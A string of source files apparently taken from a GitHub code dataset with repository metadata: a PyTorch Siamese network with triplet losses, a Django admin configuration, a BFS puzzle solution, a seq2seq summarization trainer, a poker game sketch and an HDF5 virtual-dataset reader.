self).__init__()\n\n if backbone==\"resnet18\":\n pretrained_net = models.resnet18(pretrained=True)\n self.inplanes = 64\n\n self.convnet = nn.Sequential()\n self.convnet.add_module('conv1',nn.Conv2d(1, self.inplanes, kernel_size=7, stride=2, padding=3,\n bias=False))\n for idx, layer in enumerate(pretrained_net.children()):\n # Change the first conv and last linear layer\n if isinstance(layer, nn.Linear) == False and idx!=0:\n self.convnet.add_module(str(idx),layer)\n\n self.use_fc = True\n self.fc = nn.Linear(512, embedding_size)\n\n elif backbone==\"efficientnet-b0\":\n self.use_fc = False\n self.convnet = EfficientNet.from_pretrained('efficientnet-b0',num_classes=128, in_channels=1)\n elif backbone==\"vgg11\":\n\n pretrained_net = models.vgg11().features\n self.inplanes = 64\n\n self.convnet = nn.Sequential()\n self.convnet.add_module('conv1', nn.Conv2d(1, self.inplanes, kernel_size=3, padding=1))\n for idx, layer in enumerate(pretrained_net.children()):\n # Change the first conv and last linear layer\n if idx != 0:\n self.convnet.add_module(str(idx), layer)\n self.convnet.add_module('averagepool',nn.AdaptiveAvgPool2d(1))\n self.use_fc = True\n self.fc = nn.Linear(512, embedding_size)\n\n elif backbone==\"alex\":\n self.use_fc = True\n\n self.convnet = nn.Sequential(\n # conv1\n nn.Conv2d(1, 96, 5, 1,padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(3, 2),\n # conv2\n nn.Conv2d(96, 256, 5, 1,padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(3, 2),\n # conv3\n nn.Conv2d(256, 384, 3, 1,padding=1),\n nn.ReLU(inplace=True),\n # conv4\n nn.Conv2d(384, 384, 3, 1,padding=1),\n nn.ReLU(inplace=True),\n # conv5\n nn.AdaptiveAvgPool2d(1))\n self.fc = nn.Linear(384, embedding_size)\n\n\n def forward(self, x):\n return self.get_embedding(x)\n\n def get_embedding(self, x):\n output = self.convnet(x)\n if self.use_fc:\n output = output.view(output.size()[0], -1)\n output = self.fc(output)\n output = F.normalize(output, p=2, dim=1)\n # multiply by alpha = 10 as suggested in https://arxiv.org/pdf/1703.09507.pdf\n alpha = 10\n output = output * alpha\n return output\n\nclass Classifinet(EmbeddingNet):\n def __init__(self,\n backbone=\"efficientnet-b0\",\n embedding_size=128):\n super(Classifinet, self).__init__(backbone,embedding_size)\n self.classifier = nn.Sequential(nn.Linear(embedding_size, 1))\n # self.initialize()\n\n def initialize(self):\n nn.init.xavier_uniform(self.classifier.weight.data)\n self.classifier.bias.data.zero_()\n\n def forward(self, x1, x2):\n embed_1 = self.get_embedding(x1)\n embed_2 = self.get_embedding(x2)\n\n embed = torch.abs(embed_1-embed_2)\n output = torch.sigmoid(self.classifier(embed))\n return output\n\n\nclass DTripletLoss(nn.Module):\n \"\"\"\n Triplet loss\n Takes embeddings of an anchor sample, a positive sample and a negative sample\n \"\"\"\n\n def __init__(self, margin = 5.):\n super(DTripletLoss, self).__init__()\n self.margin = margin\n self.pair_loss = PairwiseDistance(2)\n\n\n def forward(self, anchor1, anchor2, negative1, negative2, size_average=True):\n distance_positive1 = self.pair_loss(anchor1, anchor2)\n distance_positive2 = self.pair_loss(negative1, negative2)\n distance_negative1 = self.pair_loss(anchor1, negative2)\n distance_negative2 = self.pair_loss(anchor2, negative1)\n losses = distance_positive1 + distance_positive2 + F.relu( - distance_negative1 - distance_negative2 + self.margin)\n return losses.mean()\n\nclass TripletLoss(nn.Module):\n \"\"\"\n Triplet loss\n Takes embeddings of an anchor sample, a positive sample and a negative sample\n \"\"\"\n\n def __init__(self, margin = 1.):\n super(TripletLoss, self).__init__()\n self.margin = margin\n self.pair_loss = PairwiseDistance(2)\n self.alpha = 2\n\n\n def forward(self, embed_f, embed_l, size_average=True):\n batch_size = embed_f.shape[0]\n index = np.arange(batch_size)\n new_index = index.copy()-1\n distance_positive1 = self.pair_loss(embed_f[index], embed_l[index])\n distance_negative1 = self.pair_loss(embed_f[index], embed_l[new_index])\n distance_negative2 = self.pair_loss(embed_f[new_index], embed_l[index])\n\n losses = F.relu(2*distance_positive1 - distance_negative1 - distance_negative2 + self.margin)\n return losses.mean(), distance_positive1.mean(), (distance_negative2+distance_negative1).mean()/2\n\nclass ITripletLoss(nn.Module):\n \"\"\"\n Triplet loss\n Takes embeddings of an anchor sample, a positive sample and a negative sample\n \"\"\"\n\n def __init__(self, margin = 1.):\n super(ITripletLoss, self).__init__()\n self.margin = margin\n self.pair_loss = PairwiseDistance(2)\n\n\n def forward(self, embed_f, embed_l, size_average=True):\n split_index = embed_f.shape[0]//2\n distance_positive1 = self.pair_loss(embed_f[:split_index], embed_l[:split_index])\n distance_positive2 = self.pair_loss(embed_f[split_index:], embed_l[split_index:])\n distance_negative1 = self.pair_loss(embed_f[:split_index], embed_f[split_index:])\n distance_negative2 = self.pair_loss(embed_l[:split_index], embed_l[split_index:])\n losses = F.relu(distance_positive1 + distance_positive2 - distance_negative1 - distance_negative2 + self.margin)\n return losses.mean()\n\nclass ContrastiveLoss(nn.Module):\n \"\"\"\n Contrastive loss\n Takes embeddings of an anchor sample, a positive sample and a negative sample\n \"\"\"\n\n def __init__(self, margin = 1.):\n super(ContrastiveLoss, self).__init__()\n self.margin = margin\n self.pair_loss = PairwiseDistance(2)\n\n\n def forward(self, embed_f, embed_l, size_average=True):\n losses = self.pair_loss(embed_f, embed_l)\n return losses.mean()\n\nclass ClassificationLoss(nn.Module):\n \"\"\"\n Contrastive loss\n Takes embeddings of an anchor sample, a positive sample and a negative sample\n \"\"\"\n def __init__(self,embed_size=128):\n super(ClassificationLoss, self).__init__()\n self.classifier = nn.Sequential(nn.Linear(embed_size*2,1),\n nn.Sigmoid())\n\n self.cretio = nn.BCELoss()\n # self.initialize()\n\n\n\n def forward(self,embed_f, embed_l, target):\n pred = self.predict(embed_f,embed_l)\n print(pred)\n print(target)\n loss = self.cretio(pred,target)\n return loss\n\n def evaluate(self,embed_f, embed_l):\n batch_size = embed_f.shape[0]\n index = np.arange(batch_size)\n new_index = index.copy() - 1\n\n correct = 0\n correct += torch.sum(self.predict(embed_f[index],embed_l[index])>0.5).data.cpu().numpy()\n correct += torch.sum(self.predict(embed_f[index],embed_l[new_index])<0.5).data.cpu().numpy()\n return batch_size*2,correct\n\n def predict(self,embed_1, embed_2):\n input_vect = torch.cat([embed_1,embed_2],dim=1)\n return self.classifier(input_vect)\n\n\n\n\n\n\n\n", "repo_name": "UCSD-AI4H/XRayGAN", "sub_path": "models/Siamese.py", "file_name": "Siamese.py", "file_ext": "py", "file_size_in_byte": 8067, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Module", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torchvision.models.resnet18", "line_number": 17, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "efficientnet_pytorch.EfficientNet.from_pretrained", "line_number": 33, "usage_type": "call"}, {"api_name": "efficientnet_pytorch.EfficientNet", "line_number": 33, "usage_type": "name"}, {"api_name": "torchvision.models.vgg11", "line_number": 36, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.AdaptiveAvgPool2d", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.AdaptiveAvgPool2d", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_uniform", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 95, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 95, "usage_type": "name"}, {"api_name": "torch.abs", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.modules.distance.PairwiseDistance", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 127, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 127, "usage_type": "name"}, {"api_name": "torch.nn.modules.distance.PairwiseDistance", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 148, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 151, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 151, "usage_type": "name"}, {"api_name": "torch.nn.modules.distance.PairwiseDistance", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 169, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 172, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 172, "usage_type": "name"}, {"api_name": "torch.nn.modules.distance.PairwiseDistance", "line_number": 181, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 188, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 188, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 195, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.nn.Sigmoid", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 196, "usage_type": "name"}, {"api_name": "torch.nn.BCELoss", "line_number": 198, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 198, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 216, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 217, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 221, "usage_type": "call"}]} +{"seq_id": "35414991835", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib import admin\n\n# Register your models here.\nfrom account.admin import admin_site\nfrom statistics.models import Statistics, TStatistics\n\n\nclass StatisticsAdmin(admin.ModelAdmin):\n list_display = [\"date\", \"channel\", \"version\", \"ad_source\", \"ad_type\", \"show_count\", \"click_count\", \"download_count\",\n \"success_download_count\", \"install_count\", \"success_install_count\", \"launch_count\", \"gold_count\"]\n\n def get_actions(self, request):\n actions = super(StatisticsAdmin, self).get_actions(request)\n if request.user.username[0].upper() != 'J':\n if 'delete_selected' in actions:\n del actions['delete_selected']\n return actions\n\n\nclass TStatisticsAdmin(admin.ModelAdmin):\n list_display = [\"date\", \"ad_source\", \"ad_position\", \"request_time\", \"request_count\", \"return_count\", \"show_count\",\n \"fill_percent\", \"show_percent\"]\n\n def get_actions(self, request):\n actions = super(TStatisticsAdmin, self).get_actions(request)\n if request.user.username[0].upper() != 'J':\n if 'delete_selected' in actions:\n del actions['delete_selected']\n return actions\n\n\nadmin_site.register(Statistics, StatisticsAdmin)\nadmin_site.register(TStatistics, TStatisticsAdmin)\n", "repo_name": "echoturing/make_money", "sub_path": "statistics/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 1363, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 11, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 23, "usage_type": "name"}, {"api_name": "account.admin.admin_site.register", "line_number": 35, "usage_type": "call"}, {"api_name": "statistics.models.Statistics", "line_number": 35, "usage_type": "argument"}, {"api_name": "account.admin.admin_site", "line_number": 35, "usage_type": "name"}, {"api_name": "account.admin.admin_site.register", "line_number": 36, "usage_type": "call"}, {"api_name": "statistics.models.TStatistics", "line_number": 36, "usage_type": "argument"}, {"api_name": "account.admin.admin_site", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "35587837896", "text": "import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nm,n,k = map(int,input().split())\ngraph = [[0]*n for _ in range(m)]\ndx = [1, 0, -1, 0]\ndy = [0, 1, 0, -1]\narea = [] # 넓이\n\n# 도형 채우기\nfor _ in range(k):\n x1,y1,x2,y2 = map(int,input().split())\n for i in range(y1,y2): # y2-y1, 세로길이들\n for j in range(x1,x2): # x2-x1, 가로길이들\n graph[i][j] = 1 # 그래프에 채우기\n \ndef BFS(x,y):\n cnt = 1\n graph[x][y] = 1\n q = deque([(x,y)])\n while q:\n x,y = q.popleft() \n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if nx>=0 and nx=0 and ny 0:\n use_coverage = True\n for b in range(batch_n):\n # initialization\n batch_x = article[b*batch_size: (b+1)*batch_size]\n batch_y = title[b*batch_size: (b+1)*batch_size]\n #batch_x_ext = article_extend[b*batch_size: (b+1)*batch_size]\n batch_x, batch_x_ext, batch_y, extend_vocab, extend_lengths = \\\n utils.batch_index(batch_x, batch_y, word2idx, target2idx)\n\n if args.use_cuda:\n batch_x = batch_x.cuda()\n batch_y = batch_y.cuda()\n batch_x_ext = batch_x_ext.cuda()\n x_lengths = source_lengths[b*batch_size: (b+1)*batch_size]\n y_lengths = target_lengths[b*batch_size: (b+1)*batch_size]\n\n # work around to deal with length\n pack = pack_padded_sequence(batch_x_ext, x_lengths, batch_first=True)\n batch_x_ext_var, _ = pad_packed_sequence(pack, batch_first=True)\n current_loss = train_on_batch(encoder, decoder, optimizer,\n batch_x, batch_y, x_lengths, y_lengths,\n word2idx, target2idx, batch_x_ext_var,\n extend_lengths, use_coverage)\n\n batch_x = batch_x.cpu()\n batch_y = batch_y.cpu()\n batch_x_ext = batch_x_ext.cpu()\n\n print('epoch:{}/{}, batch:{}/{}, loss:{}'.format(epoch+1, n_epoch, b+1, batch_n, current_loss))\n if (b+1) % args.show_decode == 0:\n torch.save(encoder.state_dict(), 'encoder_model')\n torch.save(decoder.state_dict(), 'decoder_model')\n batch_x_val, batch_x_ext_val, batch_y_val, extend_vocab, extend_lengths = \\\n utils.batch_index(val_article, val_title, word2idx, target2idx)\n for i in range(1):\n idx = np.random.randint(0,val_size)\n decode.beam_search(encoder, decoder, batch_x_val[idx].unsqueeze(0),\n batch_y_val[idx].unsqueeze(0), word2idx, target2idx,\n batch_x_ext_val[idx], extend_lengths[idx],\n extend_vocab[idx])\n\n batch_x_val = batch_x_val.cpu()\n batch_y_val = batch_y_val.cpu()\n batch_x_ext_val = batch_x_ext_val.cpu()\n\n total_loss += current_loss\n print('-'*30)\n\n print()\n print(\"training finished\")\n\n\ndef reverse_mapping(word2idx):\n\n idx2word = {v:k for (k,v) in word2idx.items()}\n\n return idx2word\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--use_cuda\",action=\"store_true\")\n parser.add_argument(\"-beam_size\",action=\"store\", type=int)\n parser.add_argument(\"-show_decode\",action=\"store\", type=int)\n parser.add_argument(\"-batch\",action=\"store\", type=int)\n parser.add_argument(\"-train_size\", action=\"store\", type=int)\n parser.add_argument(\"--CNN\",action=\"store_true\")\n parser.add_argument(\"--giga\",action=\"store_true\")\n args = parser.parse_args()\n\n if os.path.exists('./temp/x.pkl'):\n article, title, s_lengths, t_lengths,\\\n val_article, val_title, val_source_lengths,\\\n val_target_lengths,word2idx = utils.load_everything()\n target2idx = word2idx\n else:\n article, title, s_lengths, t_lengths, word2idx, target2idx = prepare_training(args)\n\n train(article, title, word2idx, target2idx, s_lengths, t_lengths, args,\n val_article, val_title, val_source_lengths, val_target_lengths)\n\n\n", "repo_name": "b02902026/Summarization_project", "sub_path": "summary.py", "file_name": "summary.py", "file_ext": "py", "file_size_in_byte": 6691, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.autograd.Variable", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 19, "usage_type": "call"}, {"api_name": "prepare_data.sort_by_length", "line_number": 31, "usage_type": "call"}, {"api_name": "prepare_data.padding", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "prepare_data.sampling", "line_number": 45, "usage_type": "call"}, {"api_name": "prepare_data.save_everything", "line_number": 47, "usage_type": "call"}, {"api_name": "seq2seq.Encoder", "line_number": 66, "usage_type": "call"}, {"api_name": "seq2seq.Decoder", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 72, "usage_type": "attribute"}, {"api_name": "prepare_data.batch_index", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn.pack_padded_sequence", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn.pad_packed_sequence", "line_number": 109, "usage_type": "call"}, {"api_name": "training.train_on_batch", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 122, "usage_type": "call"}, {"api_name": "prepare_data.batch_index", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 126, "usage_type": "attribute"}, {"api_name": "decode.beam_search", "line_number": 127, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "attribute"}, {"api_name": "prepare_data.load_everything", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "16176343180", "text": "# Poker\nfrom texasholdem import Player, NotEnoughPlayerError, PlayerLimitExceededError, NotEnoughPlayerBankrollError, \\\n OutOfBuyInRangeError, OccupiedSeatError, Deck\nfrom texasholdem.table import Table\n\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\ntable = Table(name=\"mytable\")\n\nlogger.debug(\n \"Creater new table. (id={})\".format(\n table.id\n )\n)\n\ntable.max_player = 2\ntable.stakes\n{\n \"BB\": 2,\n \"SB\": 1,\n \"ante\": 0,\n}\n\nlogger.debug(\n \"Table Information. {}\".format(\n table\n )\n)\n\nplayer_sasaki = Player(\n name=\"Sasaki\",\n bankroll=10000\n)\n\nplayer_lapi = Player(\n name=\"Lapi\",\n bankroll=10000\n)\n\ntry:\n table.add_players([player_sasaki, player_lapi])\nexcept PlayerLimitExceededError as e:\n # 人数制限を超えた場合\n raise e\n\ntry:\n table.seat_player(\n player=player_sasaki,\n seat_number=seat_number,\n )\nexcept OccupiedSeatError as e:\n # 席が空いていない場合\n raise e\nfinally:\n pass\n# 最終処理\n\n\ntry:\n table.buy_in(\n player=player_sasaki,\n amount=200,\n )\nexcept NotEnoughPlayerBankrollError as e:\n # Bankroll不足\n raise e\nexcept OutOfBuyInRangeError as e:\n # Buy-in範囲\n raise e\nfinally:\n # 最終処理\n pass\n# ゲームの開始準備\n# BB決めたり\n\n\ntry:\n table.initialize()\nexcept NotEnoughPlayerError as e:\n # 人数不足の場合\n raise e\nwhile table.isActive():\n # ハンドを進める\n play_hand(hand)\n # Playerの増減処理\n # バイイン\n # 次のハンドへ(BBの移動など)\n table.next_hand()\n\n\n# ゲーム終了処理\n\n\ndef play_hand(table):\n # Initialise\n cards = Deck()\n cards.shuffle() # 乱数シードを記録\n\n order_of_players = [p for p in table.order_of_players if isinstance(p, Player)]\n\n # プレイヤーに十分なスタックがあるか確認\n # Pre-Flop\n # Flop\n # Turn\n # River\n", "repo_name": "dragoneena12/holdem-server", "sub_path": "texasholdem/flow.py", "file_name": "flow.py", "file_ext": "py", "file_size_in_byte": 1972, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "texasholdem.table.Table", "line_number": 11, "usage_type": "call"}, {"api_name": "texasholdem.Player", "line_number": 33, "usage_type": "call"}, {"api_name": "texasholdem.Player", "line_number": 38, "usage_type": "call"}, {"api_name": "texasholdem.PlayerLimitExceededError", "line_number": 45, "usage_type": "name"}, {"api_name": "texasholdem.OccupiedSeatError", "line_number": 54, "usage_type": "name"}, {"api_name": "texasholdem.NotEnoughPlayerBankrollError", "line_number": 67, "usage_type": "name"}, {"api_name": "texasholdem.OutOfBuyInRangeError", "line_number": 70, "usage_type": "name"}, {"api_name": "texasholdem.NotEnoughPlayerError", "line_number": 82, "usage_type": "name"}, {"api_name": "texasholdem.Deck", "line_number": 99, "usage_type": "call"}, {"api_name": "texasholdem.Player", "line_number": 102, "usage_type": "argument"}]} +{"seq_id": "20442279681", "text": "import abc\nimport os\nimport tempfile\nfrom pathlib import Path\n\nimport h5py\n\nfrom ams.store import AMSDataStore\n\n\nclass AMSHDF5VirtualDBReader:\n class DataDescr:\n def __init__(self, input_shape, i_type, output_shape, o_type):\n self._i_shape = input_shape\n self._o_shape = output_shape\n self._i_type = i_type\n self._o_type = o_type\n\n @property\n def i_shape(self):\n return self._i_shape\n\n @property\n def o_shape(self):\n return self._o_shape\n\n @property\n def i_type(self):\n return self._i_type\n\n @property\n def o_type(self):\n return self._o_type\n\n @staticmethod\n def verify_dsets(dsets_descr):\n i_types = set()\n o_types = set()\n i_shape = set()\n o_shape = set()\n for k, v in dsets_descr.items():\n i_types.add(v.i_type)\n o_types.add(v.o_type)\n i_shape.add(v.i_shape[-1])\n o_shape.add(v.o_shape[-1])\n if len(i_types) != 1:\n raise RuntimeError(f\"File {k} has un-expected data-type\")\n\n if len(o_types) != 1:\n raise RuntimeError(f\"File {k} has un-expected data-type\")\n\n if len(i_shape) != 1:\n raise RuntimeError(f\"File {k} has un-expected input shape\")\n\n if len(o_shape) != 1:\n raise RuntimeError(f\"File {k} has un-expected output shape\")\n\n return\n\n @staticmethod\n def create_vds_layout(dsets_descr):\n fn = next(iter(dsets_descr))\n i_shape = list(dsets_descr[fn].i_shape)\n o_shape = list(dsets_descr[fn].o_shape)\n i_type = dsets_descr[fn].i_type\n o_type = dsets_descr[fn].o_type\n\n i_shape[0] = sum(v.i_shape[0] for k, v in dsets_descr.items())\n o_shape[0] = sum(v.o_shape[0] for k, v in dsets_descr.items())\n\n assert i_shape[0] == o_shape[0], \"Outer dimension of input/output shape does not match\"\n\n print(fn, i_type, i_shape)\n print(fn, o_type, o_shape)\n\n i_layout = h5py.VirtualLayout(shape=tuple(i_shape), dtype=i_type)\n o_layout = h5py.VirtualLayout(shape=tuple(o_shape), dtype=o_type)\n\n outer_index = 0\n for k, v in dsets_descr.items():\n i_source = h5py.VirtualSource(k, \"inputs\", shape=v.i_shape)\n i_layout[outer_index : outer_index + v.i_shape[0], ...] = i_source\n o_source = h5py.VirtualSource(k, \"outputs\", shape=v.o_shape)\n o_layout[outer_index : outer_index + v.o_shape[0], ...] = o_source\n outer_index += v.i_shape[0]\n\n return i_layout, o_layout\n\n def __init__(self, files, i_names=list(), o_names=list()):\n dsets_descr = dict()\n\n if not files:\n return\n\n for f in files:\n print(f\"Processing file: {f}\")\n # Every file has both input, output data\n # Open file and pick the data types and the shapes.\n # We need those to map them correctly to a virtual file.\n with h5py.File(f, \"r\") as fd:\n i_shape = fd[\"inputs\"].shape\n i_type = fd[\"inputs\"].dtype\n o_shape = fd[\"outputs\"].shape\n o_type = fd[\"outputs\"].dtype\n\n if not i_names:\n i_names = [f\"input_{i}\" for i in range(i_shape[-1])]\n else:\n if len(i_names) != i_shape[-1]:\n raise RuntimeError(f\"Input name description {i_names} differs in size with {i_shape[-1]}\")\n\n if not o_names:\n o_names = [f\"output_{i}\" for i in range(o_shape[-1])]\n else:\n if len(o_names) != o_shape[-1]:\n raise RuntimeError(f\"Ouput name description {o_names} differs in size with {o_shape[-1]}\")\n\n dsets_descr[f] = AMSHDF5VirtualDBReader.DataDescr(i_shape, i_type, o_shape, o_type)\n\n self.verify_dsets(dsets_descr)\n i_vds, o_vds = self.create_vds_layout(dsets_descr)\n self._fn = Path(tempfile.mkdtemp()) / Path(\"VDS.h5\")\n print(f\"VDS name is {self._fn}\")\n\n with h5py.File(self._fn, \"w\") as fd:\n fd.create_virtual_dataset(\"inputs\", i_vds)\n fd.create_virtual_dataset(\"outputs\", o_vds)\n\n @property\n def fn(self):\n return self._fn\n\n def destroy(self):\n parent = self._fn.parents[0]\n os.remove(str(self._fn))\n os.rmdir(parent)\n self._fn = None\n\n def __del__(self):\n if self._fn is not None:\n print(\"Deleting object but virtual data set file is not delete from file system\")\n\n\nclass AMSDataView(abc.ABC):\n def __init__(self, ams_store, entry=\"data\", versions=None, **options):\n assert len(self.input_feature_names) == len(\n self.input_feature_dims\n ), \"input feature names does not match dimensions\"\n assert len(self.input_feature_names) == len(\n self.input_feature_types\n ), \"input feature types does not match dimensions of inputs\"\n assert len(self.output_feature_names) == len(\n self.output_feature_dims\n ), \"output feature names does not match output feature dimensions\"\n assert len(self.output_feature_names) == len(\n self.output_feature_types\n ), \"output feature names does not match type dimensions\"\n\n assert entry in AMSDataStore.valid_entries, \"entry is not a valid store entry\"\n\n assert entry != \"model\", \"AMSDataviewcannot 'read' models\"\n\n self._store = ams_store\n self._entry = entry\n self._versions = versions\n\n def __enter__(self):\n return self.open()\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n return self.close()\n\n def close(self):\n self._fd.close()\n self._fd = None\n self._hvds.destroy()\n self._hvds = None\n\n def open(self):\n if self._store.is_open():\n data_files = self._store.get_files(self._entry, self._versions)\n else:\n store = self._store.open()\n data_files = self._store.get_files(self._entry, self._versions)\n store.close()\n if not data_files:\n raise ValueError(\n f\"Opening AMS Store in entry '{self._entry}' does not have files for the requested versions\"\n )\n\n self._hvds = 